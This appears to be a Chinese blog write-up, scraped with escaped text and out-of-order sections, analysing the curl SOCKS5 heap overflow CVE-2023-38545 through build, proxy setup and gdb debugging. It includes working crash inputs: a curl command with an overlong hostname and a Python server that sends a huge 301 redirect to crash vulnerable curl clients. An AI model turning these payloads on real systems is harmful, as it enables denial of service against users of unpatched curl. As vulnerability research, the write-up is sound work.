\u4e3b\u673a\u540d\u592a\u957f\uff0c\u8d85\u8fc7255\u5b57\u8282\uff0c\u5c31\u4f1a\u8fd4\u56de\u62a5\u9519\u3002<\/p>\n\n\n\n \u6839\u636e\u8865\u4e01\u5206\u6790\uff0c\u6210\u56e0\u5728\u4e8ehostname\u957f\u5ea6\u5927\u4e8e255\u65f6\uff0cmemcpy\u62f7\u8d1d\u4e3b\u673a\u540d\u7684\u65f6\u5019\uff0c\u90a3\u4e48\u6211\u4eec\u627e\u5230\u5bf9\u5e94\u7684\u4ee3\u7801\uff0c\u6f0f\u6d1e\u89e6\u53d1\u7684\u903b\u8f91\u5e94\u8be5\u5982\u4e0b\u6240\u793a\uff1a<\/p>\n\n\n\n 1\u3001\u4e3b\u673a\u540dhostname\u957f\u5ea6\u5927\u4e8e255\u65f6\uff0c\u4f1a\u8fdb\u884c\u672c\u5730\u89e3\u6790<\/p>\n\n\n\n 2\u3001\u672c\u5730\u89e3\u6790\u4e3b\u673a\u540d<\/p>\n\n\n\n 3\u3001\u672c\u5730\u89e3\u6790\u5931\u8d25\u540e\uff0c\u4f1a\u8fdb\u884c\u8fdc\u7a0b\u89e3\u6790\uff0c\u5f53\u4e3b\u673a\u540d\u8d85\u957f\u65f6\uff0cmemcpy\u62f7\u8d1d\u65f6\u8d85\u8fc7socksreq\u7684\u5927\u5c0f\uff0c\u9020\u6210\u5806\u6ea2\u51fa\uff08\u5b9e\u9645\u8c03\u8bd5\u7684\u8fc7\u7a0b\u4e2d\u5e76\u6ca1\u6709\u8fdb\u884c\u672c\u5730\u89e3\u6790\uff0c\u4f1a\u76f4\u63a5\u8fdb\u884c\u8fdc\u7a0b\u89e3\u6790\uff0c\u539f\u56e0\u4e0d\u77e5\u4e3a\u4f55\uff1f\uff09<\/p>\n\n\n\n \u7cfb\u7edf\u4e3aUbuntu 20.04 64\u4f4d\u7cfb\u7edf\uff0c\u5b89\u88c5\u9700\u8981\u7684\u4f9d\u8d56<\/p>\n\n\n\n \u53c2\u8003hatboy\u5e08\u5085\u7684python\u7248\u672c\u7684socks5\u670d\u52a1\u7aef\u4ee3\u7801\uff0c\u4fdd\u5b58\u5176\u4e2d\u201c\u4e0d\u9700\u8981\u8ba4\u8bc1\u7684socks5\u670d\u52a1\u5668\u201c\u4ee3\u7801\u4e3asocks.py\uff0c\u7aef\u53e3\u8fd9\u91cc\u8bbe\u7f6e\u4e3a1080\uff1a<\/p>\n\n\n\n \u4e0b\u8f7dcurl 8.3.0\u7248\u672c\u7684\u6e90\u7801\u8fdb\u884c\u7f16\u8bd1\uff0c\u4e3a\u4e86\u4e4b\u540e\u8c03\u8bd5\u65b9\u4fbf\u52a0\u5165\u8c03\u8bd5\u7b26\u53f7\uff08-g\uff09<\/p>\n\n\n\n \u4e3a\u4e86\u8c03\u8bd5\u65b9\u4fbf\u5b89\u88c5gef\u63d2\u4ef6<\/p>\n\n\n\n \u5b89\u88c5\u597d\u540e\uff0c\u6267\u884cgdb\u4f1a\u6709gef>\u63d0\u793a\u7b26\u3002<\/p>\n\n\n\n checksec\u67e5\u770b\u7a0b\u5e8f\u4fdd\u62a4\u60c5\u51b5\uff0c\u4fdd\u62a4\u5168\u5f00<\/p>\n\n\n\n \u6b63\u5e38\u7684RCE\u5229\u7528\u51e0\u4e4e\u4e0d\u53ef\u80fd\uff0c\u4ec5\u80fd\u9020\u6210\u62d2\u7edd\u670d\u52a1<\/p>\n\n\n\n \u6839\u636e\u6f0f\u6d1e\u6210\u56e0\uff0c\u8bbe\u5b9alimit-rate\u5927\u5c0f\u4e3a1024\uff0c\u4e3b\u673a\u540d\u5927\u5c0f2048<\/p>\n\n\n\n \u6267\u884c\u540e\u4f1a\u4f7f\u7a0b\u5e8f\u53d1\u751f\u6bb5\u9519\u8bef\uff0c\u9020\u6210\u62d2\u7edd\u670d\u52a1<\/p>\n\n\n\n 1\u3001\u8c03\u8bd5<\/p>\n\n\n\n \u51fa\u73b0\u5d29\u6e83\uff0c\u65ad\u5728cfilters.c \u7684446\u884c<\/p>\n\n\n\n 2\u3001\u4e0b\u65ad\u70b9<\/p>\n\n\n\n \u4e0b\u65ad\u70b9 b socks.c:907<\/p>\n\n\n\n \u65ad\u4e0b\u6765\uff0cmemcpy\u62f7\u8d1d\u4e4b\u540e\uff0c\u9020\u6210\u6ea2\u51fa<\/p>\n\n\n\n \u5806\u5757\u663e\u793a0x411\uff0c\u9664\u53bb0x10\u7684\u5934\u90e8\u548c\u6807\u5fd71\uff0c\u5b9e\u9645\u5927\u5c0f\u4e3a0x400\uff0c\u53c2\u8003\u4ee5\u4e0b\u5806\u7ed3\u6784\u56fe\u793a\uff1a<\/p>\n\n\n\n \u95ee\uff1a5.1\u662f\u672c\u5730\u6307\u5b9a\u8bbf\u95ee\u7684\u5730\u5740\u9020\u6210\u62d2\u7edd\u670d\u52a1\uff0c\u90a3\u4e48\u8bbf\u95ee\u4e00\u4e2a\u6b63\u5e38\u7684\u5730\u5740\uff0c\u80fd\u5426\u9020\u6210\u62d2\u7edd\u670d\u52a1\u5462\uff1f<\/p>\n\n\n\n \u7b54\uff1a\u7b54\u6848\u662f\u80af\u5b9a\u7684\uff0c\u6839\u636e\u5b98\u65b9\u6587\u7ae0\u8bf4\u660e\uff0ccurl\u53ef\u4ee5\u652f\u6301\u91cd\u5b9a\u5411\uff0c\u901a\u8fc7301\u8df3\u8f6c\u7684\u5730\u5740\u8d85\u957f\u5c31\u4f1a\u9020\u6210\u7c7b\u4f3c\u7684\u6548\u679c\u3002\u51c6\u5907\u4e00\u4e2a\u6b63\u5e38\u7684Web\u670d\u52a1\uff0c\u5982\u4e0b\u6240\u793a\uff1a<\/p>\n\n\n\n \u6267\u884c\u547d\u4ee4\uff0c\u52a0\u4e0a\u53c2\u6570-L\u652f\u6301\u91cd\u5b9a\u5411<\/p>\n\n\n\n \u540c\u6837\u53ef\u4ee5\u9020\u6210\u5d29\u6e83<\/p>\n\n\n\n 1\u3001\u5927\u5bb6\u6709\u6ca1\u6709\u53d1\u73b0\u53c2\u6570\u4e2d\u5305\u542blimit-rate\u53c2\u6570\uff0c\u5982\u679c\u6ca1\u6709\u5462\uff1f<\/p>\n\n\n\n \u518d\u6765\u8c03\u8bd5\u4e00\u4e0b\uff0c\u53d1\u73b0socksreq\u5927\u5c0f\u4e3a0x19000\uff0c\u8db3\u4ee5\u6ee1\u8db30x2000\uff0c\u4e0d\u4f1a\u9020\u6210\u5806\u6ea2\u51fa<\/p>\n\n\n\n 2\u3001\u90a3\u4e48\u6211\u4eec\u628a\u91cd\u5b9a\u5411\u7684\u4e3b\u673a\u540d0x2000\u6269\u5927\u52300x20000\u5462\uff1f<\/p>\n\n\n\n \u7b54\u6848\uff1a\u76f4\u63a5\u62a5\u9519\u9000\u51fa\uff0c\u5185\u5b58\u4e0d\u8db3\u3002<\/p>\n\n\n\n 3\u3001\u7559\u4e0b\u4e00\u4e2a\u95ee\u9898<\/p>\n\n\n\n \u5f53\u7cfb\u7edf\u7684ASLR\u6ca1\u5f00\u65f6\uff0c\u80fd\u591f\u6b63\u5e38\u5229\u7528\u5417\uff1f<\/p>\n\n\n\n \u5f53\u4f7f\u7528socks5\u4ee3\u7406\u65f6\uff0c\u5982\u679c\u4e3b\u673a\u540d\u5927\u4e8e255\uff0c\u5219curl\u4f1a\u5c1d\u8bd5\u4f7f\u7528\u672c\u5730\u89e3\u6790\u4ee3\u66ff\u8fdc\u7a0b\u89e3\u6790\uff0c\u4f46\u6ca1\u6709\u6309\u7167\u9884\u671f\u5de5\u4f5c\uff0c\u5bfc\u81f4\u5185\u5b58\u635f\u574f\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u6784\u9020\u6076\u610f\u4e3b\u673a\u540d\u89e6\u53d1\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u6f0f\u6d1e\u53ef\u80fd\u9020\u6210\u4ee3\u7801\u6267\u884c\u3002<\/p>\n\n\n\n \u4f46\u7ecf\u9a8c\u8bc1\u8be5\u6f0f\u6d1e\u5229\u7528\u6761\u4ef6\u82db\u523b\uff0c\u5f71\u54cd\u529b\u6709\u9650\u3002<\/p>\n\n\n\n https:\/\/curl.se\/docs\/CVE-2023-38545.html<\/a><\/p>\n\n\n\n https:\/\/zhuanlan.zhihu.com\/p\/530364753<\/a><\/p>\n\n\n\n![\"\"](\"https:\/\/www.zhiwanyuzhou.com\/wp-content\/uploads\/2024\/03\/image.png\")
<\/figure>\n\n\n\n\u4e09\u3001\u6f0f\u6d1e\u6210\u56e0<\/h2>\n\n\n\n
![\"\"](\"https:\/\/www.zhiwanyuzhou.com\/wp-content\/uploads\/2024\/03\/image-1.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/www.zhiwanyuzhou.com\/wp-content\/uploads\/2024\/03\/image-2.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/www.zhiwanyuzhou.com\/wp-content\/uploads\/2024\/03\/image-3.png\")
<\/figure>\n\n\n\n\u56db\u3001\u73af\u5883\u51c6\u5907<\/h2>\n\n\n\n
4.1 \u7cfb\u7edf\u73af\u5883<\/h3>\n\n\n\n
sudo apt update\nsudo apt install make gdb gcc git checksec\n<\/code><\/pre>\n\n\n\n4.2 \u8fd0\u884c\u4ee3\u7406\u670d\u52a1<\/h3>\n\n\n\n
import select\nimport socket\nimport logging, struct\nfrom socketserver import StreamRequestHandler, ThreadingTCPServer\nSOCKS_VERSION = 5\nclass SocksProxy(StreamRequestHandler):\n def handle(self):\n print('Accepting connection from {}'.format(self.client_address))\n # \u534f\u5546\n # \u4ece\u5ba2\u6237\u7aef\u8bfb\u53d6\u5e76\u89e3\u5305\u4e24\u4e2a\u5b57\u8282\u7684\u6570\u636e\n header = self.connection.recv(2)\n version, nmethods = struct.unpack(\"!BB\", header)\n # \u8bbe\u7f6esocks5\u534f\u8bae\uff0cMETHODS\u5b57\u6bb5\u7684\u6570\u76ee\u5927\u4e8e0\n assert version == SOCKS_VERSION\n assert nmethods > 0\n # \u63a5\u53d7\u652f\u6301\u7684\u65b9\u6cd5\n methods = self.get_available_methods(nmethods)\n # \u65e0\u9700\u8ba4\u8bc1\n if 0 not in set(methods):\n self.server.close_request(self.request)\n return\n # \u53d1\u9001\u534f\u5546\u54cd\u5e94\u6570\u636e\u5305\n self.connection.sendall(struct.pack(\"!BB\", SOCKS_VERSION, 0))\n # \u8bf7\u6c42\n version, cmd, _, address_type = struct.unpack(\"!BBBB\", self.connection.recv(4))\n assert version == SOCKS_VERSION\n if address_type == 1: # IPv4\n address = socket.inet_ntoa(self.connection.recv(4))\n elif address_type == 3: # Domain name\n domain_length = self.connection.recv(1)[0]\n address = self.connection.recv(domain_length)\n #address = socket.gethostbyname(address.decode(\"UTF-8\")) # \u5c06\u57df\u540d\u8f6c\u5316\u4e3aIP\uff0c\u8fd9\u4e00\u884c\u53ef\u4ee5\u53bb\u6389\n elif address_type == 4: # IPv6\n addr_ip = self.connection.recv(16)\n address = socket.inet_ntop(socket.AF_INET6, addr_ip)\n else:\n self.server.close_request(self.request)\n return\n port = struct.unpack('!H', self.connection.recv(2))[0]\n # \u54cd\u5e94\uff0c\u53ea\u652f\u6301CONNECT\u8bf7\u6c42\n try:\n if cmd == 1: # CONNECT\n remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n remote.connect((address, port))\n bind_address = remote.getsockname()\n print('Connected to {} {}'.format(address, port))\n else:\n self.server.close_request(self.request)\n addr = struct.unpack(\"!I\", socket.inet_aton(bind_address[0]))[0]\n port = bind_address[1]\n #reply = struct.pack(\"!BBBBIH\", SOCKS_VERSION, 0, 0, address_type, addr, port)\n # \u6ce8\u610f\uff1a\u6309\u7167\u6807\u51c6\u534f\u8bae\uff0c\u8fd4\u56de\u7684\u5e94\u8be5\u662f\u5bf9\u5e94\u7684address_type\uff0c\u4f46\u662f\u5b9e\u9645\u6d4b\u8bd5\u53d1\u73b0\uff0c\u5f53address_type=3\uff0c\u4e5f\u5c31\u662f\u8bf4\u662f\u57df\u540d\u7c7b\u578b\u65f6\uff0c\u4f1a\u51fa\u73b0\u5361\u6b7b\u60c5\u51b5\uff0c\u4f46\u662f\u5c06address_type\u8be5\u4e3a1\uff0c\u5219\u4e0d\u7ba1\u662fIP\u7c7b\u578b\u548c\u57df\u540d\u7c7b\u578b\u90fd\u80fd\u6b63\u5e38\u8fd0\u884c\n reply = struct.pack(\"!BBBBIH\", SOCKS_VERSION, 0, 0, 1, addr, port)\n except Exception as err:\n logging.error(err)\n # \u54cd\u5e94\u62d2\u7edd\u8fde\u63a5\u7684\u9519\u8bef\n reply = self.generate_failed_reply(address_type, 5)\n self.connection.sendall(reply)\n # \u5efa\u7acb\u8fde\u63a5\u6210\u529f\uff0c\u5f00\u59cb\u4ea4\u6362\u6570\u636e\n if reply[1] == 0 and cmd == 1:\n self.exchange_loop(self.connection, remote)\n self.server.close_request(self.request)\n def get_available_methods(self, n):\n methods = []\n for i in range(n):\n methods.append(ord(self.connection.recv(1)))\n return methods\n def generate_failed_reply(self, address_type, error_number):\n return struct.pack(\"!BBBBIH\", SOCKS_VERSION, error_number, 0, address_type, 0, 0)\n def exchange_loop(self, client, remote):\n while True:\n # \u7b49\u5f85\u6570\u636e\n r, w, e = select.select([client, remote], [], [])\n if client in r:\n data = client.recv(4096)\n if remote.send(data) <= 0:\n break\n if remote in r:\n data = remote.recv(4096)\n if client.send(data) <= 0:\n break\nif __name__ == '__main__':\n # \u4f7f\u7528socketserver\u5e93\u7684\u591a\u7ebf\u7a0b\u670d\u52a1\u5668ThreadingTCPServer\u542f\u52a8\u4ee3\u7406\n with ThreadingTCPServer(('127.0.0.1', 1080), SocksProxy) as server:\n server.serve_forever()\n<\/code><\/pre>\n\n\n\n4.3 \u7f16\u8bd1\u6e90\u7801<\/h3>\n\n\n\n
wget https:\/\/github.com\/curl\/curl\/releases\/download\/curl-8_3_0\/curl-8.3.0.zip\nunzip curl-8.3.0.zip\ncd curl-8.3.0\n.\/configure --prefix=\/usr\/local\/curl --without-ssl --disable-dependency-tracking CFLAGS=-g\nmake\nmake install<\/code><\/pre>\n\n\n\n4.4 \u5b89\u88c5GDB\u8c03\u8bd5\u63d2\u4ef6<\/h3>\n\n\n\n
git clone https:\/\/github.com\/gatieme\/GdbPlugins.git ~\/GdbPlugins\necho 'source ~\/GdbPlugins\/gef\/gef.py' > ~.bashinit<\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/www.zhiwanyuzhou.com\/wp-content\/uploads\/2024\/03\/image-4.png\")
<\/figure>\n\n\n\n\u4e94\u3001\u6f0f\u6d1e\u5206\u6790<\/h2>\n\n\n\n
5.1 \u6f0f\u6d1e\u5229\u7528<\/h3>\n\n\n\n
![\"\"](\"https:\/\/www.zhiwanyuzhou.com\/wp-content\/uploads\/2024\/03\/image-5.png\")
<\/figure>\n\n\n\n1\u3001\tNX\uff0c\u65e0\u6cd5\u4f7f\u7528shellcode\n2\u3001\tPIE\uff0c\u5730\u5740\u968f\u673a\n3\u3001\t\u6ca1\u6709\u6cc4\u9732\u5730\u5740\u7684\u5730\u65b9\n4\u3001\t\u57df\u540d\u4e0d\u80fd\u5305\u542b\u7279\u6b8a\u5b57\u7b26\uff0c\u6bd4\u5982\u7a7a\u5b57\u8282\n<\/code><\/pre>\n\n\n\n\/usr\/local\/curl\/bin\/curl --limit-rate 1024 --proxy socks5h:\/\/localhost:1080 http:\/\/`python3 -c \"print('A'*2048)\"`<\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/www.zhiwanyuzhou.com\/wp-content\/uploads\/2024\/03\/image-6.png\")
<\/figure>\n\n\n\n5.2 \u52a8\u6001\u8c03\u8bd5<\/h3>\n\n\n\n
gdb \/usr\/local\/curl\/bin\/curl\ngef> set args --limit-rate 1024 --proxy socks5h:\/\/localhost:1080 http:\/\/AAAA....\uff08\u8fd9\u91cc\u7701\u7565n\u4e2aA\uff09\nget> r\n<\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/www.zhiwanyuzhou.com\/wp-content\/uploads\/2024\/03\/image-8.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/www.zhiwanyuzhou.com\/wp-content\/uploads\/2024\/03\/image-9.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/www.zhiwanyuzhou.com\/wp-content\/uploads\/2024\/03\/image-10.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/www.zhiwanyuzhou.com\/wp-content\/uploads\/2024\/03\/image-11.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/www.zhiwanyuzhou.com\/wp-content\/uploads\/2024\/03\/image-12.png\")
<\/figure>\n\n\n\n5.3 \u8fdb\u9636\u5229\u7528<\/h3>\n\n\n\n
#conding:utf8\nimport socket\n\n# \u521b\u5efasocket\u5bf9\u8c61\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n# \u83b7\u53d6\u672c\u5730\u4e3b\u673a\u540d\u548c\u7aef\u53e3\u53f7\nhost = ''\nport = 8080\n\n# \u5c06socket\u5bf9\u8c61\u7ed1\u5b9a\u5230\u6307\u5b9a\u7684\u4e3b\u673a\u548c\u7aef\u53e3\u4e0a\nserver_socket.bind((host, port))\n# \u5f00\u59cb\u76d1\u542c\u8fde\u63a5\nserver_socket.listen(1)\n\n# \u7b49\u5f85\u5ba2\u6237\u7aef\u8fde\u63a5\nwhile True:\n print(\"\u7b49\u5f85\u5ba2\u6237\u7aef\u8fde\u63a5...\")\n client_socket, client_address = server_socket.accept()\n \n print(\"\u8fde\u63a5\u6765\u81ea: \", client_address)\n # \u63a5\u6536\u5ba2\u6237\u7aef\u53d1\u9001\u7684\u6570\u636e\n data = client_socket.recv(1024)\n # \u5904\u7406\u63a5\u6536\u5230\u7684\u6570\u636e\n print(\"\u63a5\u6536\u5230\u7684\u6570\u636e\u4e3a: \", data.decode())\n # \u53d1\u9001\u54cd\u5e94\u6570\u636e\u7ed9\u5ba2\u6237\u7aef\n message = b'HTTP\/1.0 301 Moved Permanently\\r\\nLocation: http:\/\/' + b'A'*0x20000 + b'\\r\\n\\r\\n'\n # \u53d1\u9001\u7684\u6570\u636e\n print(\"\u53d1\u9001\u7684\u6570\u636e\u4e3a: \", message)\n client_socket.sendall(message)\n # \u5173\u95ed\u5ba2\u6237\u7aef\u8fde\u63a5\n client_socket.close()\n<\/code><\/pre>\n\n\n\n\/usr\/local\/curl\/bin\/curl --limit-rate 1024 --proxy socks5h:\/\/localhost:1080 -L http:\/\/localhost:8080<\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/www.zhiwanyuzhou.com\/wp-content\/uploads\/2024\/03\/image-13.png\")
<\/figure>\n\n\n\n5.4 \u5229\u7528\u601d\u8003<\/h3>\n\n\n\n
![\"\"](\"https:\/\/www.zhiwanyuzhou.com\/wp-content\/uploads\/2024\/03\/image-14.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/www.zhiwanyuzhou.com\/wp-content\/uploads\/2024\/03\/image-15.png\")
<\/figure>\n\n\n\n\u516d\u3001\u603b\u7ed3<\/h2>\n\n\n\n
\u4e03\u3001\u53c2\u8003\u94fe\u63a5<\/h2>\n\n\n\n